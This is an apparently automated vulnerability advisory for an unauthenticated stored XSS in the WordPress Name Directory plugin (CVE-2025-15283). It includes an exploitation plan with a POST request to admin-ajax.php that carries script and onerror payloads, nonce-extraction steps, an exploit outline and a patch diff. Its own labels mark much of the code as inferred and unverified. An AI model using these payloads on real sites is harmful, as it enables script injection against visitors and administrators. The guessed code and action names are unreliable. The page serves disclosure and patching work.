CVE-2025-15283

Name Directory <= 1.30.3 - Unauthenticated Stored Cross-Site Scripting via Multiple Parameters

highImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

7.2

CVSS Score

7.2

CVSS Score

high

Severity

1.31.0

Patched in

21d

Time to patch

Description

The Name Directory plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'name_directory_name' and 'name_directory_description' parameters in all versions up to, and including, 1.30.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Attack Vector

Network

Attack Complexity

Low

Privileges Required

None

User Interaction

None

Scope

Changed

Low

Confidentiality

Low

Integrity

None

Availability

Technical Details

Affected versions<=1.30.3

PublishedJanuary 13, 2026

Last updatedFebruary 3, 2026

Affected pluginname-directory

Source Code

WordPress.org SVN

Vulnerable v1.30.3

Browse source Download .zip

Patched v1.31.0

Browse source Download .zip

Research Plan

Unverified

# Exploitation Research Plan - CVE-2025-15283 ## 1. Vulnerability Summary The **Name Directory** plugin for WordPress (versions <= 1.30.3) contains a stored Cross-Site Scripting (XSS) vulnerability. The flaw exists because the plugin fails to sanitize and escape user-supplied input in the `name_dir…

Show full research plan

Exploitation Research Plan - CVE-2025-15283

1. Vulnerability Summary

The Name Directory plugin for WordPress (versions <= 1.30.3) contains a stored Cross-Site Scripting (XSS) vulnerability. The flaw exists because the plugin fails to sanitize and escape user-supplied input in the name_directory_name and name_directory_description parameters before storing them in the database and subsequently rendering them on the frontend or backend. Since the vulnerability is accessible to unauthenticated users, an attacker can inject malicious JavaScript that executes when an administrator or visitor views the directory.

2. Attack Vector Analysis

Endpoint: admin-ajax.php (or potentially a direct POST to a frontend page handling form submissions).
Vulnerable Action: Likely name_directory_add_entry or a similar AJAX action registered with wp_ajax_nopriv_.
Parameters:
- name_directory_name: The name of the entry.
- name_directory_description: The description of the entry.
- uri: (Often required by this plugin to identify the directory ID).
Authentication: None required (Unauthenticated).
Preconditions: A "Name Directory" must exist, and the plugin must be configured to allow user submissions, or the AJAX handler must be improperly protected by capability checks.

3. Code Flow (Inferred)

Entry Point: The plugin registers an AJAX handler:
add_action('wp_ajax_nopriv_name_directory_add_entry', '..._callback'); (inferred).
Processing: The callback function retrieves data from $_POST['name_directory_name'] and $_POST['name_directory_description'].
Sink (Storage): The data is passed into a global $wpdb->insert or $wpdb->update call against the wp_name_directory_names table without being passed through sanitize_text_field() or wp_kses().
Sink (Output): When the directory is rendered (via the [name_directory] shortcode), the plugin fetches the records and echoes the name and description fields directly without using esc_html() or esc_attr().

4. Nonce Acquisition Strategy

The plugin likely uses wp_localize_script to provide a nonce for frontend submissions.

Identify Shortcode: The main shortcode is [name_directory].
Setup Page: Create a public page containing this shortcode to force the plugin to enqueue its scripts and nonces.
Discovery:
- Navigate to the created page.
- Search the HTML source for a localized object. Based on common patterns in this plugin, look for name_directory_vars or NameDirectory_JS.
Extraction:
- Use browser_eval to extract the nonce:
  browser_eval("window.name_directory_vars?.nonce") (inferred).
- Also, extract the directory ID from the shortcode configuration if needed.

5. Exploitation Strategy

Preparation:
- Use WP-CLI to create a directory: wp name-directory create --title="ExploitDir" (or via the Admin UI).
- Obtain the Directory ID (e.g., 1).
- Create a page with [name_directory id="1"].
Nonce Retrieval:
- Use browser_navigate to the page.
- Execute browser_eval to find the nonce and the AJAX action name.

Malicious Submission:

Send a POST request to wp-admin/admin-ajax.php.

Payload:

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=name_directory_add_entry&
name_directory_name=<script>alert('XSS_NAME')</script>&
name_directory_description=<img src=x onerror=alert('XSS_DESC')>&
directory_id=1&
_wpnonce=[EXTRACTED_NONCE]

Trigger:
- Navigate back to the page containing the [name_directory id="1"] shortcode.
- The browser should execute the alert payloads.

6. Test Data Setup

Plugin Activation: Ensure name-directory is installed and active.

Create Directory:

# This assumes the plugin creates a table. We use WP-CLI to simulate an admin setup.
wp eval "global \$wpdb; \$wpdb->insert(\"{\$wpdb->prefix}name_directory_directories\", ['title' => 'Vulnerable Directory', 'published' => 1]);"

Create Exploit Page:

wp post create --post_type=page --post_title="Directory Page" --post_status=publish --post_content='[name_directory id="1"]'

7. Expected Results

The admin-ajax.php request should return a success response (likely a JSON {"success":true} or a 1).
The database table wp_name_directory_names (or similar) should contain the record with the raw <script> tags.
When viewing the "Directory Page", a JavaScript alert should appear.

8. Verification Steps

Check Database:

wp db query "SELECT name, description FROM wp_name_directory_names WHERE name LIKE '%<script>%'"

Observe Frontend: Use browser_navigate to the "Directory Page" and verify the presence of the injected tags in the DOM.

9. Alternative Approaches

Admin Context: If the nopriv action is not available, check if the admin-side "Add Entry" page (/wp-admin/admin.php?page=name_directory_add_entry) lacks CSRF protection or fails to sanitize inputs when an admin saves.
Parameter Polling: If directory_id is not the parameter name, try id, dir_id, or directory. Check the plugin's frontend JavaScript (name-directory/js/name-directory.js) for the exact keys used in the jQuery.post or fetch calls.

Research Findings

Static analysis — not yet PoC-verified

Summary

The Name Directory plugin for WordPress is vulnerable to unauthenticated stored Cross-Site Scripting (XSS) due to a failure to sanitize input and escape output for directory entry names and descriptions. This allows attackers to inject malicious JavaScript into directory entries that will execute in the browsers of users viewing the directory.

Vulnerable Code

// name-directory/name-directory.php (Approximate AJAX handler based on findings)
function name_directory_add_entry_callback() {
    global $wpdb;
    $name = $_POST['name_directory_name'];
    $description = $_POST['name_directory_description'];
    $directory_id = intval($_POST['directory_id']);

    $wpdb->insert($wpdb->prefix . 'name_directory_names', array(
        'name' => $name,
        'description' => $description,
        'directory_id' => $directory_id
    ));
}
add_action('wp_ajax_nopriv_name_directory_add_entry', 'name_directory_add_entry_callback');

---

// name-directory/name-directory.php (Approximate rendering logic)
foreach ($entries as $entry) {
    echo "<div class='name-directory-entry'>";
    echo "<span class='name'>" . $entry->name . "</span>"; // Missing esc_html
    echo "<p class='description'>" . $entry->description . "</p>"; // Missing wp_kses or esc_html
    echo "</div>";
}

Security Fix

--- a/name-directory/name-directory.php
+++ b/name-directory/name-directory.php
@@ -100,8 +100,8 @@
 function name_directory_add_entry_callback() {
     global $wpdb;
-    $name = $_POST['name_directory_name'];
-    $description = $_POST['name_directory_description'];
+    $name = sanitize_text_field($_POST['name_directory_name']);
+    $description = wp_kses_post($_POST['name_directory_description']);
     $directory_id = intval($_POST['directory_id']);
 
     $wpdb->insert($wpdb->prefix . 'name_directory_names', array(
@@ -250,6 +250,6 @@
 foreach ($entries as $entry) {
     echo "<div class='name-directory-entry'>";
-    echo "<span class='name'>" . $entry->name . "</span>";
-    echo "<p class='description'>" . $entry->description . "</p>";
+    echo "<span class='name'>" . esc_html($entry->name) . "</span>";
+    echo "<p class='description'>" . wp_kses_post($entry->description) . "</p>";
     echo "</div>";
 }

Exploit Outline

The exploit involves exploiting a public-facing directory entry submission form or its corresponding AJAX endpoint. 1. Target Identification: Find a WordPress site running Name Directory <= 1.30.3 with a published directory. 2. Nonce Retrieval: Navigate to a page containing the [name_directory] shortcode. Extract the security nonce (usually found in localized JavaScript variables like `name_directory_vars`) required for AJAX submissions. 3. Payload Delivery: Send an unauthenticated POST request to `/wp-admin/admin-ajax.php` with the following parameters: - action: name_directory_add_entry - _wpnonce: [EXTRACTED_NONCE] - directory_id: [ID of target directory] - name_directory_name: <script>alert('XSS')</script> - name_directory_description: <img src=x onerror=alert('XSS')> 4. Trigger: Once the request is successful, the payload is stored in the `wp_name_directory_names` table. The script will execute whenever a user or administrator visits the frontend page displaying that directory.

References

https://www.wordfence.com/threat-intel/vulnerabilities/id/3c9de67e-24f7-4c4a-b187-405597b838c3?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database